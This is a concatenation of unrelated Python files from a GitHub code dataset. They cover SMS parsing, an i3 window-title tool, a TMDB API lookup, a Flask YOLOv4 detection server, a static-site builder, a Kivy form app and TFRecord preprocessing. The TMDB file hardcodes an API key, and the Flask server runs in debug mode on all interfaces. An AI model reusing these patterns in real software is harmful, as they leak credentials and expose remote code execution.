self.MI.setCategoricalFeatures(categorical_features)\n","repo_name":"MaurizioFD/recsys-challenge-2020-twitter","sub_path":"ParamTuning/Optimizer.py","file_name":"Optimizer.py","file_ext":"py","file_size_in_byte":13613,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"6"} +{"seq_id":"34419033073","text":"import BeautifulSoup\n\n#This shit was taken from the documentation.\ndef extractsms(htmlsms) :\n \"\"\"\n extractsms -- extract SMS messages from BeautifulSoup tree of Google Voice SMS HTML.\n\n Output is a list of dictionaries, one per message.\n \"\"\"\n msgitems = [] # accum message items here\n # Extract all conversations by searching for a DIV with an ID at top level.\n tree = BeautifulSoup.BeautifulSoup(htmlsms) # parse HTML into tree\n conversations = tree.findAll(\"div\",attrs={\"id\" : True},recursive=False)\n for conversation in conversations :\n # For each conversation, extract each row, which is one SMS message.\n rows = conversation.findAll(attrs={\"class\" : \"gc-message-sms-row\"})\n for row in rows : # for all rows\n # For each row, which is one message, extract all the fields.\n msgitem = {\"id\" : conversation[\"id\"]} # tag this message with conversation ID\n spans = row.findAll(\"span\",attrs={\"class\" : True}, recursive=False)\n for span in spans : # for all spans in row\n cl = span[\"class\"].replace('gc-message-sms-', '')\n msgitem[cl] = (\" \".join(span.findAll(text=True))).strip() # put text in dict\n msgitems.append(msgitem) # add msg dictionary to list\n return msgitems\n\ndef extractInput(htmlsms, number):\n messages = []\n for msg in extractsms(htmlsms):\n if number in msg[u'from']:\n messages.append(msg)\n #only interested in latest message.\n return messages[-1][u'text']\n\n\n\n\n#found this shit on stackoverflow\ndef stripHtmlTags(htmlTxt):\n if htmlTxt is None:\n return None\n else:\n return ''.join(BeautifulSoup.BeautifulSoup(htmlTxt).findAll(text=True))\n\ndef sizeof_fmt(num):\n for x in ['bytes','KB','MB','GB']:\n if num < 1024.0:\n return \"%3.1f%s\" % (num, x)\n num /= 1024.0\n return \"%3.1f%s\" % (num, 'TB')\n","repo_name":"mrmoth/whattxt","sub_path":"modules.py","file_name":"modules.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"37999178241","text":"#!/usr/bin/env python\n\nimport i3ipc\nimport argparse\n\nparser = argparse.ArgumentParser(description='Print the active window\\'s title')\nparser.add_argument('-t', '--truncate', help='Truncate titles to a max length', type=int, default=None)\nparser.add_argument('-s', '--subscribe', help='Monitor the active window and print whenever it changes', action='store_true')\nargs = parser.parse_args()\n\ntruncate_to = None\nif args.truncate:\n truncate_to = max(1, args.truncate - 3)\n\ndef print_window_title(container):\n title = container.name\n if not title:\n print(\"\")\n return\n if args.truncate and len(title) > args.truncate:\n title = title[:truncate_to] + '...'\n print(title)\n\ndef on_window_focus(i3, e):\n print_window_title(e.container)\n\ni3 = i3ipc.Connection()\nprint_window_title(i3.get_tree().find_focused())\nif args.subscribe:\n i3.on(\"window::focus\", on_window_focus)\n i3.on(\"window::title\", on_window_focus)\n i3.main()\n","repo_name":"jtsymon/i3title","sub_path":"i3title.py","file_name":"i3title.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"31778165807","text":"\nimport requests\n# this python file can be imported and used whenever API call needs to be made\n#to retrieve movie from TMDB based on movie id\ndef get_movie_details(movie_id):\n apikey=\"?api_key=ddb1cae2b2c35f2ad7e50626679381e5\"\n main_api=\"https://api.themoviedb.org/3/movie/\"\n url=main_api+movie_id+apikey\n json_data=requests.get(url).json()\n return json_data\n\n","repo_name":"vishyarjun/movieTrailerWebsite","sub_path":"json_api.py","file_name":"json_api.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"38544446620","text":"import json \r\nfrom flask import jsonify\r\nimport tensorflow as tf\r\nphysical_devices = tf.config.experimental.list_physical_devices('GPU')\r\nif len(physical_devices) > 0:\r\n tf.config.experimental.set_memory_growth(physical_devices[0], True)\r\nfrom absl import app, flags, logging\r\nfrom absl.flags import FLAGS\r\nimport core.utils as utils\r\nfrom core.config import cfg\r\nfrom core.yolov4 import filter_boxes\r\nfrom tensorflow.python.saved_model import tag_constants\r\nfrom PIL import Image\r\nimport cv2\r\nimport numpy as np\r\nfrom tensorflow.compat.v1 import ConfigProto\r\nfrom tensorflow.compat.v1 import InteractiveSession\r\nimport time \r\nimport os\r\nfrom watchdog.observers import Observer\r\nfrom watchdog.events import FileSystemEventHandler\r\nimport matplotlib.pyplot as plt\r\nfrom flask import Flask\r\nfrom flask import render_template, request\r\nfrom werkzeug.utils import secure_filename\r\nimport base64\r\nimport io\r\napp = Flask(__name__)\r\n\r\nprint(\"Test started\")\r\nconfig = ConfigProto()\r\nconfig.gpu_options.allow_growth = True\r\nsession = InteractiveSession(config=config)\r\ninput_size = 416\r\nsaved_model_loaded = tf.saved_model.load('./checkpoints/yolov4-416', tags=[tag_constants.SERVING])\r\nprint(\"Model loaded\")\r\nmonitor_dir = r'C:/Yolo2Tensor/tensorflow-yolov4-tflite/data/images/test'\r\ncollageDirectory = r'C:/Yolo2Tensor/tensorflow-yolov4-tflite/collage'\r\nUPLOAD_FOLDER = 'C:/Users/yunxing/Downloads/Telegram Desktop/YoloTensor2/Yolo2Tensor/tensorflow-yolov4-tflite/upload_folder/'\r\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\r\n\r\n@app.route('/upload', methods = ['POST', 'GET'])\r\ndef upload():\r\n if request.method == 'POST':\r\n print('post request received')\r\n label = ''\r\n file = request.json.get('photo')\r\n # filename = secure_filename(file.filename)\r\n # base_path = os.path.dirname(__file__)\r\n # image_path = os.path.join(app.config['UPLOAD_FOLDER'], filename)\r\n # file.save(image_path)\r\n imgdata = base64.b64decode(file)\r\n PILImage = Image.open(io.BytesIO(imgdata)).rotate(180)\r\n #print(PILImage)\r\n print(\"image received\")\r\n label = run_model(PILImage)\r\n return label\r\n return render_template('index.html')\r\n \r\n\r\ncount = 1\r\nimageList = []\r\n # loop through images in list and run Yolov4 model on each\r\ndef run_model(PILImage):\r\n countFilesInCollage = len([name for name in os.listdir(collageDirectory) if os.path.isfile(os.path.join(collageDirectory, name))])\r\n if countFilesInCollage == 0:\r\n imageList.clear()\r\n global count\r\n # print(r'{}'.format(image_path))\r\n\r\n # time.sleep(1)\r\n # #original_image = plt.imread(r'{}'.format(image_path.replace('\\\\', '/')))\r\n # original_image = cv2.imread(r'{}'.format(image_path.replace('\\\\', '/')))\r\n # print(original_image)\r\n # original_image = cv2.cvtColor(original_image, cv2.COLOR_BGR2RGB)\r\n\r\n\r\n\r\n original_image = cv2.cvtColor(np.array(PILImage), cv2.IMREAD_COLOR)\r\n image_data = cv2.resize(original_image, (input_size, input_size))\r\n image_data = image_data / 255.\r\n\r\n images_data = []\r\n for i in range(1):\r\n images_data.append(image_data)\r\n images_data = np.asarray(images_data).astype(np.float32)\r\n\r\n infer = saved_model_loaded.signatures['serving_default']\r\n batch_data = tf.constant(images_data)\r\n pred_bbox = infer(batch_data)\r\n for key, value in pred_bbox.items():\r\n boxes = value[:, :, 0:4]\r\n pred_conf = value[:, :, 4:]\r\n\r\n boxes, scores, classes, valid_detections = tf.image.combined_non_max_suppression(\r\n boxes=tf.reshape(boxes, (tf.shape(boxes)[0], -1, 1, 4)),\r\n scores=tf.reshape(\r\n pred_conf, (tf.shape(pred_conf)[0], -1, tf.shape(pred_conf)[-1])),\r\n max_output_size_per_class=50,\r\n max_total_size=50,\r\n iou_threshold=0.45,\r\n score_threshold=0.25\r\n )\r\n\r\n #Get scores & classes and sort them into finalDictionary (not ranked based on max yet)\r\n scoreArray = (scores.numpy()).flat\r\n classesArray = (classes.numpy()).flat\r\n finalScoreArray = []\r\n finalClassArray = []\r\n finalDictionary = {}\r\n\r\n listOfClasses = [\"A\", \"B\", \"Bullseye\", \"C\", \"D\", \"Down\", \"E\", \"F\", \"G\", \"H\", \"Left\", \"Right\", \"S\", \"Stop\",\r\n \"T\", \"U\", \"Up\", \"V\", \"W\", \"X\", \"Y\", \"Z\", \"eight\", \"five\", \"four\", \"nine\",\r\n \"one\", \"seven\", \"six\", \"three\", \"two\"]\r\n \r\n listOfIDs = [15, 16, 31, 17, 18, 2, 19, 20, 21, 22, 4, 3, 23, 5, 24, 25, 1, 26, 27, 28, 29, 30, 13, 10, 9, 14, 6, 12, 11, 8, 7]\r\n\r\n listOfRequiredClasses = [\"Alphabet A\", \"Alphabet B\", \"Bullseye\", \"Alphabet C\", \"Alphabet D\", \"down arrow\", \"Alphabet E\", \"Alphabet F\", \"Alphabet G\", \"Alphabet H\", \"left arrow\", \"right arrow\", \"Alphabet S\", \"Stop\",\r\n \"Alphabet T\", \"Alphabet U\", \"Up arrow\", \"Alphabet v\", \"Alphabet w\", \"Alphabet x\", \"Alphabet y\", \"Alphabet z\", \"eight\", \"five\", \"four\", \"nine\",\r\n \"one\", \"seven\", \"six\", \"three\", \"two\"]\r\n if scoreArray[0] > 0:\r\n\r\n for i in range(len(scoreArray)):\r\n if scoreArray[i] > 0.0:\r\n finalScoreArray.append(scoreArray[i])\r\n finalClassArray.append(classesArray[i])\r\n finalDictionary.update({listOfClasses[int(finalClassArray[i])]: str(scoreArray[i])})\r\n\r\n\r\n\r\n else:\r\n print(\"No Detections\")\r\n\r\n print(\"finalDictionary: \", finalDictionary)\r\n\r\n pred_bbox = [boxes.numpy(), scores.numpy(), classes.numpy(), valid_detections.numpy()]\r\n\r\n # read in all class names from config\r\n class_names = utils.read_class_names(cfg.YOLO.CLASSES)\r\n\r\n # by default allow all classes in .names file\r\n print(class_names)\r\n\r\n allowed_classes = list(class_names.values())\r\n\r\n print(allowed_classes)\r\n \r\n # custom allowed classes (uncomment line below to allow detections for only people)\r\n #allowed_classes = ['person']\r\n\r\n image = utils.draw_bbox(original_image, pred_bbox, allowed_classes = allowed_classes)\r\n\r\n image = Image.fromarray(image.astype(np.uint8))\r\n\r\n \r\n image.show()\r\n image = cv2.cvtColor(np.array(image), cv2.COLOR_BGR2RGB)\r\n\r\n imageList.append(image)\r\n imagecollage = cv2.hconcat(imageList)\r\n\r\n cv2.imwrite('./detections/' + 'detection' + str(count) + '.jpg', image)\r\n cv2.imwrite('./collage/' + 'detection' + str(count) + '.jpg', imagecollage)\r\n count += 1\r\n print(finalDictionary)\r\n return jsonify(finalDictionary)\r\n\r\nif __name__ == '__main__':\r\n app.run(debug=True, host = '0.0.0.0')\r\n","repo_name":"simpleesamm/Yolov4_Tensorflow-Object_Detection","sub_path":"model_server_new.py","file_name":"model_server_new.py","file_ext":"py","file_size_in_byte":6572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"35701525542","text":"#!/usr/bin/python3\n#builds a static version of site for deployment into /output\nfrom jinja2 import Environment, FileSystemLoader, select_autoescape\nfrom pathlib import Path\nfrom shutil import copytree,rmtree\nimport os\n\nfinal_templates = ['lander.html', '404.html', 'contact.html']\nstatic_dir = \"static\"\n\ndef make_output_dir(output_dir):\n Path(output_dir).mkdir(parents=True, exist_ok=True)\n\ndef generate_static(output_dir=\"./output\", static_prefix=\"/static/\"):\n\n if os.path.isdir(output_dir):\n print(\"Clearing output directory..\")\n rmtree(output_dir)\n\n env = Environment(\n loader=FileSystemLoader('templates'),\n autoescape=select_autoescape(['html', 'xml'])\n )\n\n make_output_dir(output_dir)\n\n for leaf in final_templates:\n leaf_template = env.get_template(\"directory/\"+leaf)\n leaf_html = leaf_template.render(foo='bar', STATIC_PREFIX=static_prefix)\n print(\"Writing {} to {}...\".format(leaf, output_dir+\"/\"+leaf))\n with open(output_dir+\"/\"+leaf, \"w+\") as f:\n f.write(leaf_html)\n\n print(\"Copying static files to {}\".format(output_dir))\n copytree(static_dir, output_dir+\"/\"+static_dir)\n\n print(\"Done! Static site ready in {}\".format(output_dir))\n\n\nif __name__ == '__main__':\n #For testing.\n #generate_static(static_prefix=\"./static/\")\n generate_static()\n","repo_name":"virtualsnow/txtsx-template","sub_path":"build-static.py","file_name":"build-static.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"43627839144","text":"from kivy.app import App\nfrom kivy.lang import Builder\nfrom kivy.uix.recycleview import RecycleView\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.screenmanager import ScreenManager, Screen\nfrom kivy.properties import BooleanProperty\nfrom kivy.properties import NumericProperty\nfrom kivy.uix.tabbedpanel import TabbedPanel\nfrom kivy.clock import Clock, mainthread\nfrom functools import partial\nimport json\nimport csv, datetime, decimal, math, re, os, time\nfrom kivy.uix.recycleview.layout import LayoutSelectionBehavior\n###Define Constants\ncc = ',';\ncnl = '\\n';\ndnl = '\\r\\n'\npi = math.pi;\nmi2km = 1.609344;\nmi2meter = 1609.344;\nkm2meter = 1000;\nfeet2meter = 0.3048\nGt = 1;\nGr = 1 # db gain of transmitter and receiver assume to 1 (no gain)\nalexp = 2.75 # effective exponent of distance due to environment; 2 for free space\nERk = 6371 # earth radius in km (6371) (or in miles (3963))\nER = 3963 # earth radius in km (6371) (or in miles (3963))\nDEC = ERk * pi / 180 # degree-earth-conversion factor: 111.1949266_km or 69.16739826_mile\nDRC = 180 / pi # degree-radian-conversion factor: 57.29577951\nrd = \"AM,FB,FL,FM,FX\" # radio service codes of radio broadcasters\ntv = \"CA,DC,DT,LD,TX\" # radio service codes of TV broadcasters\nbc = rd + ',' + tv # radio service codes of radio and TV broadcasters\nps = \"GE,GF,GP,IQ,MW,PA,PW,SG,SL,SP,SY,WP,YE,YF,YP,YW\" # RSC of public safety group\ngv = \"GV\" # US Government GMF\nSplittingCharacters = [' ', \"'\", '\"', 'n', 'N', 's', 'S', 'e', 'E', 'w', 'W']\nnumin = lambda sn: re.search('[\\d.-]+', sn)[0] if re.search('\\d', sn)[0] else 0\ndmsd2dd = lambda dmsd: (abs(dmsd[0]) + dmsd[1] / 60 + dmsd[2] / 3600) * dmsd[3]\ndata1 = data2 = data3 = data4 = data5 = data6 = data7 = data8 = data9 = data10 = ''\n\ndef dd2dmsd(dd, lcd):\n m, s = divmod(abs(dd) * 3600, 60)\n d, m = divmod(m, 60)\n if dd >= 0:\n cd = lcd[0]\n else:\n cd = lcd[1]\n if 'N' in lcd:\n sd, sm, ss = f'{d:02.0f}', f'{m:02.0f}', f'{s:05.2f}'\n else:\n sd, sm, ss = f'{d:03.0f}', f'{m:02.0f}', f'{s:05.2f}'\n return sd, sm, ss, cd\n\ndef fduration(duration):\n ssdur = str(datetime.timedelta(seconds=duration)).split(' ')\n d = f'{int(ssdur[0]):d}d' if len(ssdur) > 1 else ''\n lhms = ssdur[-1].split(':')\n H = int(lhms[0]);\n M = int(lhms[1]);\n S = int(float(lhms[2]))\n h = f'{H:d}h' if H > 0 else ''\n m = f'{M:d}m' if M > 0 else ''\n s = f'{S:d}s' if S > 0 else ''\n return d + h + m + s\n\n\nnumin = lambda sn: re.search('[\\d.-]+',sn)[0] if re.search('\\d',sn)[0] else 0\ntdata = [{'col1': 'Band Number', 'col2': 'BBF (Hz)', 'col3': 'BEF (Hz)', 'col4': 'SWD (s)', 'col5': 'SWP (0|#)', 'col6': 'RBW (Hz)', 'col7': 'Att (dB)', 'col8': 'Ref (dBm)'\n , 'col9': 'TRM', 'col10': 'Band Info'},\n {'col1': '1', 'col2': '0.521e6', 'col3': '1.709e6', 'col4': '0', 'col5': '0', 'col6': '3e2', 'col7': '0', 'col8': '-50', 'col9': 'average'\n , 'col10': 'radio AM'}, # 1\n {'col1': '2', 'col2': '87.8e6', 'col3': '108e6', 'col4': '0', 'col5': '0', 'col6': '1e3', 'col7': '0', 'col8': '-50', 'col9': 'average'\n , 'col10': 'radio FM'}, # 2\n {'col1': '3', 'col2': '162.375e6', 'col3': '162.575e6', 'col4': '0', 'col5': '0', 'col6': '1e2', 'col7': '0', 'col8': '-50', 'col9': 'average'\n , 'col10': 'NOAA NWR'}, # 3\n {'col1': '4', 'col2': '54e6', 'col3': '88e6', 'col4': '0', 'col5': '0', 'col6': '3e3', 'col7': '0', 'col8': '-50', 'col9': 'average'\n , 'col10': 'DTV VHF1'}, # 4\n {'col1': '5', 'col2': '174e6', 'col3': '216e6', 'col4': '0', 'col5': '0', 'col6': '3e3', 'col7': '0', 'col8': '-50', 'col9': 'average'\n , 'col10': 'DTV VHF1'}, # 5\n {'col1': '6', 'col2': '470e6', 'col3': '539e6', 'col4': '0', 'col5': '0', 'col6': '3e3', 'col7': '0', 'col8': '-50', 'col9': 'average'\n , 'col10': 'DTV VHF1'}, # 6\n {'col1': '7', 'col2': '539e6', 'col3': '608e6', 'col4': '0', 'col5': '0', 'col6': '3e3', 'col7': '0', 'col8': '-50', 'col9': 'average'\n , 'col10': 'DTV VHF1'}, # 7\n ]\n\nxdata = [{'col1': 'Band Number', 'col2': 'BBF (Hz)', 'col3': 'BEF (Hz)', 'col4': 'SWD (s)', 'col5': 'SWP (0|#)', 'col6': 'RBW (Hz)', 'col7': 'Att (dB)', 'col8': 'Ref (dBm)'\n , 'col9': 'TRM', 'col10': 'Band Info'},\n {'col1': '1', 'col2': '150e6', 'col3': '174e6', 'col4': '0', 'col5': '0', 'col6': '3e3', 'col7': '0', 'col8': '-50', 'col9': 'average'\n , 'col10': 'PS 150MHz'}, # 1\n {'col1': '2', 'col2': '450e6', 'col3': '512e6', 'col4': '0', 'col5': '0', 'col6': '3e3', 'col7': '0', 'col8': '-50', 'col9': 'average'\n , 'col10': 'PS 450MHz'}, # 2\n {'col1': '3', 'col2': '758e6', 'col3': '775e6', 'col4': '0', 'col5': '0', 'col6': '3e3', 'col7': '0', 'col8': '-50', 'col9': 'average'\n , 'col10': 'PS 760MHz'}, # 3\n {'col1': '4', 'col2': '851e6', 'col3': '862e6', 'col4': '0', 'col5': '0', 'col6': '3e3', 'col7': '0', 'col8': '-50', 'col9': 'average'\n , 'col10': 'PS 850MHz'}, # 4\n ]\n\nclass Tabelle(BoxLayout):\n pass\n\nclass Table(BoxLayout):\n\n try:\n rcsinputs = open(\"rcsinputs.txt\", 'w')\n rcsinputs.write(data1 + ' ' + data2 + ' '+ data3 + ' ' + data4 + ' ' + data5 + ' ' + data6 + ' ' + data7 + ' ' + data8 + ' ' + data9 + ' ' + data10)\n rcsinputs.close()\n except (RuntimeError, ValueError, TypeError, UnboundLocalError):\n content=Label(text=\"Get rcsbands.txt first.\" + \"\\n\" + \"Touch outside to dismiss.\", halign='center', valign='middle')\n popup = Popup(title=\"Save Error\", content=content, size_hint=(.6, .6)).open()\n\n\nclass VVScreen(Screen):\n def save(self):\n data = json.dumps(xdata)\n with open('example.json', 'w') as json_file:\n json.dump(data, json_file)\n\n\nclass RVScreen(Screen):\n\n def save(self):\n data = json.dumps(tdata)\n with open('example.json', 'w') as json_file:\n json.dump(data, json_file)\n\n\n\n\n\n\nclass CustomScreen(Screen):\n pass\n\nclass FirstScreen(Screen):\n def validate_input(self, sinput):\n try:\n sinput, sid = sinput.split('|||')\n sinput = sinput.strip()\n ltsin = len(sinput)\n self.ids[sid].text = sinput\n print(sinput)\n Clock.schedule_once(partial(self._refocus_textinput, sid, ltsin))\n except (RuntimeError, ValueError, TypeError):\n content = Label(text=\"Check the input is entered.\" + \"\\n\" + \"Touch outside to dismiss.\", halign='center',\n valign='middle')\n popup = Popup(title=\"Radius Error\", content=content, size_hint=(.6, .6)).open()\n\n def _refocus_textinput(self, *args):\n self.ids[args[0]].cursor = (args[1], 0)\n self.ids[args[0]].get_focus_next().focus = True\n\n def format_radius(self, sinradius): # convert input-radius to km; validate on enter\n try:\n sid = 'radius_input'\n sinradius = (\n re.search('[ \\S]+:', sinradius)[0][:-1] if re.search('[ \\S]+:', sinradius) else sinradius).strip()\n ltsin = len(sinradius)\n radius = float(numin(sinradius))\n if 'mi' in sinradius:\n radiusmi = radius\n radius *= mi2km\n else:\n radiusmi = radius / mi2km\n sinradius += f' : [{radius:0.3f} km] = {radiusmi:0.3f} miles'\n self.ids[sid].text = sinradius\n Clock.schedule_once(partial(self._refocus_textinput, sid, ltsin))\n except (RuntimeError, ValueError, TypeError):\n content = Label(text=\"Check that radius is entered.\" + \"\\n\" + \"Touch outside to dismiss.\", halign='center',\n valign='middle')\n popup = Popup(title=\"Radius Error\", content=content, size_hint=(.6, .6)).open()\n\n def format_duration(self, sduration): # checks if duration entered and in right format\n try:\n sid = 'duration_input'\n sduration = sduration.split(':', 1)[0].strip()\n ltsin = len(sduration)\n sdurations = sduration + 's'\n D = float(re.search('[\\d. ]+d', sdurations)[0][:-1]) if re.search('[\\d. ]+d', sdurations) else 0\n H = float(re.search('[\\d. ]+h', sdurations)[0][:-1]) if re.search('[\\d. ]+h', sdurations) else 0\n M = float(re.search('[\\d. ]+m', sdurations)[0][:-1]) if re.search('[\\d. ]+m', sdurations) else 0\n S = float(re.search('[\\d. ]+s', sdurations)[0][:-1]) if re.search('[\\d. ]+s', sdurations) else 0\n tduration = D * 86400 + H * 3600 + M * 60 + S\n sduration += f' : [{tduration:0.0f} seconds] = {fduration(tduration)}'\n self.ids[sid].text = sduration\n Clock.schedule_once(partial(self._refocus_textinput, sid, ltsin))\n except (AttributeError, ValueError):\n content = Label(\n text=\"Please ensure that 'duration' is entered and in the proper format.\" + \"\\n\" + \"(hrhr:minmin:secsec)\" + \"\\n\" + \"Touch outside to dismiss.\",\n halign='center', valign='middle')\n popup = Popup(title=\"Duration Error\", content=content, size_hint=(.6, .6)).open()\n\n def save(self):\n agent = self.ids['agent_input'].text\n event = self.ids['event_input'].text\n activity = self.ids['activity_input'].text\n radius = self.ids['radius_input'].text\n duration = self.ids['duration_input'].text\n ip = self.ids['ip_input'].text\n comments = self.ids['comments_input'].text\n rcsinputs = open(\"rcsinputs.txt\", 'w')\n\n rcsinputs.write(\"Agent: \" + agent + \"\\n\" + \"Event: \" + event + \"\\n\" + \"Activity: \" + activity + \"\\n\" + \"Radius: \" + radius + \"\\n\" + \"Duration: \" + duration + \"\\n\" + \"IP: \" + ip + \"\\n\" + \"Comments: \" + comments + \"\\n\")\n rcsinputs.close()\n\n\n\n\n\n\n\n\nclass RV(RecycleView):\n def __init__(self, **kwargs):\n super(RV, self).__init__(**kwargs)\n self.data = [{'spalte1_SP': str(x['col1']), 'spalte2_SP': str(x['col2']), 'spalte3_SP': str(x['col3']),\n 'spalte4_SP': str(x['col4']),'spalte5_SP': str(x['col5']), 'spalte6_SP': str(x['col6']),\n 'spalte7_SP': str(x['col7']), 'spalte8_SP': str(x['col8']), 'spalte9_SP': str(x['col9'])\n , 'spalte10_SP': str(x['col10'])} for x in tdata]\n\nclass VV(RecycleView):\n def __init__(self, **kwargs):\n super(VV, self).__init__(**kwargs)\n self.data = [{'data1': str(x['col1']), 'data2': str(x['col2']), 'data3': str(x['col3']),\n 'data4': str(x['col4']), 'data5': str(x['col5']), 'data6': str(x['col6']),\n 'data7': str(x['col7']), 'data8': str(x['col8']), 'data9': str(x['col9'])\n , 'data10': str(x['col10'])} for x in xdata]\n\n\n\n\nclass SecondScreen(Screen):\n def validate_input(self, sinput):\n try:\n sinput, sid = sinput.split('|||')\n sinput = sinput.strip()\n ltsin = len(sinput)\n self.ids[sid].text = sinput\n Clock.schedule_once(partial(self._refocus_textinput, sid, ltsin))\n except (RuntimeError, ValueError, TypeError):\n content = Label(text=\"Check the input is entered.\" + \"\\n\" + \"Touch outside to dismiss.\", halign='center',\n valign='middle')\n popup = Popup(title=\"Radius Error\", content=content, size_hint=(.6, .6)).open()\n def format_elevation(self, selevation): # format elevation to meter from meter (m) or feet (ft)\n try:\n sid = 'elevation_input'\n selevation = selevation.split(':', 1)[0].strip()\n ltsin = len(selevation)\n elevation = float(numin(selevation))\n if 'ft' in selevation or 'feet' in selevation or 'foot' in selevation:\n elevationft = elevation\n elevation *= feet2meter\n elif 'km' in selevation:\n elevation *= km2meter\n elevationft = elevation / feet2meter\n elif 'meter' in selevation or ('m' in selevation and not re.search('[a-ln-z]+', selevation)):\n elevationft = elevation / feet2meter\n elif re.search('[a-z]+', selevation):\n emessage = \"Invalid '\" + re.search('[a-zA-Z]+', selevation)[0] + \"' unit.\"\n raise TypeError()\n else:\n elevationft = elevation / feet2meter\n selevation += f' : [{elevation:0.3f} m] = {elevationft:0.3f} ft'\n self.ids[sid].text = selevation\n Clock.schedule_once(partial(self._refocus_textinput, sid, ltsin))\n except (RuntimeError, ValueError, TypeError):\n content = Label(text=emessage + \"\\n\" + \"Touch outside to dismiss.\", halign='center', valign='middle')\n popup = Popup(title=\"Elevation Error\", content=content, size_hint=(.6, .6)).open()\n\n def _refocus_textinput(self, *args):\n self.ids[args[0]].cursor = (args[1], 0)\n self.ids[args[0]].get_focus_next().focus = True\n\n def format_latlong(self, slatlong): # adds degrees/minutes/seconds to longitude\n lcd = [];\n di = '';\n dn = 1\n try:\n if 'LATITUDE' in slatlong:\n sid = 'latitude_input'\n lcd = ['N', 'S']\n slatlong = slatlong.split(':', 1)[0].strip()\n if 'n' in slatlong.lower():\n di = 'N';\n dn = 1\n elif 's' in slatlong.lower():\n di = 'S';\n dn = -1\n elif 'LONGITUDE' in slatlong:\n sid = 'longitude_input'\n lcd = ['E', 'W']\n slatlong = slatlong.split(':', 1)[0].strip()\n if 'e' in slatlong.lower():\n di = 'E';\n dn = 1\n elif 'w' in slatlong.lower():\n di = 'W';\n dn = -1\n # lstr = [s for sd in slatlong.split(' ') for sm in sd.split(\"'\") for s in sm.split('\"') if s]\n ltsin = len(slatlong)\n lstr = [slatlong]\n for sc in SplittingCharacters:\n lsc = []\n for str in lstr:\n lsc += list(filter(('').__ne__, str.split(sc)))\n lstr = lsc\n dmsd = [0, 0, 0, dn];\n i = 0\n for str in lstr:\n try:\n dmsd[i] = float(str)\n i += 1\n except:\n continue\n if i > 2:\n break\n if dmsd[0] < 0:\n dmsd[3] = -1\n dd = dmsd2dd(dmsd)\n sdmsd = dd2dmsd(dd, lcd)\n slatlong += f' : [{dd:0.7f}] = {sdmsd[0]} {sdmsd[1]}\\' {sdmsd[2]}\" {sdmsd[3]}'\n self.ids[sid].text = slatlong\n Clock.schedule_once(partial(self._refocus_textinput, sid, ltsin))\n except (RuntimeError, ValueError, TypeError):\n content = Label(\n text=\"Check that latitude/longitude has been validated.\" + \"\\n\" + \"Touch outside to dismiss.\",\n halign='center', valign='middle')\n popup = Popup(title=\"Latitude/Longitude Error\", content=content, size_hint=(.6, .6)).open()\n\n def save(self):\n address = self.ids['address_input'].text\n citystatezip = self.ids['citystatezip_input'].text\n country = self.ids['country_input'].text\n latitude = self.ids['latitude_input'].text\n longitude = self.ids['longitude_input'].text\n elevation = self.ids['elevation_input'].text\n rcsinputs = open(\"rcsinputs.txt\", 'a')\n\n rcsinputs.write(\n \"Address: \" + address + \"\\n\" + \"City/State/Zip: \" + citystatezip + \"\\n\" + \"Country: \" + country + \"\\n\" \"Latitude: \" + latitude + \"\\n\" + \"Longitude: \" + longitude + ': ' + \"\\n\" + \"Elevation: \" + elevation + \"\\n\")\n rcsinputs.close()\n\n\n\n\nclass TestingApp(App):\n\n def build(self):\n root = ScreenManager()\n root.add_widget(FirstScreen(name='FirstScreen'))\n root.add_widget(SecondScreen(name = 'SecondScreen'))\n root.add_widget(RVScreen(name='RVScreen'))\n return root\n\n\n\n\n def save(self, event, activity, agent, address, citystatezip, country, latitude, longitude, elevation, radius, duration, ip, comments, spectrum): # formats and prompts user to save rcsinputs.txt file\n inheader = ['# tol\n if img.ndim==3:\n mask = mask.all(2)\n m,n = mask.shape\n mask0,mask1 = mask.any(0),mask.any(1)\n col_start,col_end = mask0.argmax(),n-mask0[::-1].argmax()\n row_start,row_end = mask1.argmax(),m-mask1[::-1].argmax()\n img = img[row_start:row_end,col_start:col_end]\n img = tf.convert_to_tensor(img)\n return img\n\ndef create_record(path, X, y):\n \"\"\"\n \n \"\"\"\n options = tf.io.TFRecordOptions(compression_type='GZIP')\n y = tf.convert_to_tensor(y)\n with tf.io.TFRecordWriter(path, options=options) as writer:\n for i in range(len(X)):\n try:\n image = tf.io.decode_image(tf.io.read_file(X[i]))\n except tf.errors.InvalidArgumentError as e:\n print(X[i])\n continue\n image = tf.io.decode_image(tf.io.read_file(X[i]))\n image = crop_image(image)\n image = tf.image.resize(image, (244, 244), method='nearest', preserve_aspect_ratio=True)\n image = tf.io.encode_jpeg(image)\n label = y[i]\n tf_example = create_example(image, label)\n writer.write(tf_example.SerializeToString())\n\n# On prem\n#dset_train = os.path.join(os.curdir, '../records244/train')\n#dset_val = os.path.join(os.curdir, '../records244/dset_val.tfrecord')\n#dset_test = os.path.join(os.curdir, '../records244/dset_test.tfrecord')\n\n# Colab\ndset_train = os.path.join(os.curdir, './records244/dset_train.tfrecord')\ndset_val = os.path.join(os.curdir, './records244/dset_val.tfrecord')\ndset_test = os.path.join(os.curdir, './records244/dset_test.tfrecord')\n\n\nAUTOTUNE = tf.data.experimental.AUTOTUNE\ntf.random.set_seed(42)\nrandom.seed(42)\ntrain_dataset = tf.data.TFRecordDataset(dset_train, compression_type='GZIP').shuffle(2048)\nval_dataset = tf.data.TFRecordDataset(dset_val, compression_type='GZIP')\ntest_dataset = tf.data.TFRecordDataset(dset_test, compression_type='GZIP')\n\ndef _parse_dataset(example_proto, img_size=[244, 244]):\n image_feature_description = {\n 'labels': tf.io.FixedLenFeature([], tf.string),\n 'image_raw': tf.io.FixedLenFeature([], tf.string),\n }\n parsed = tf.io.parse_single_example(example_proto, image_feature_description)\n labels = tf.io.parse_tensor(parsed['labels'], tf.int64)\n 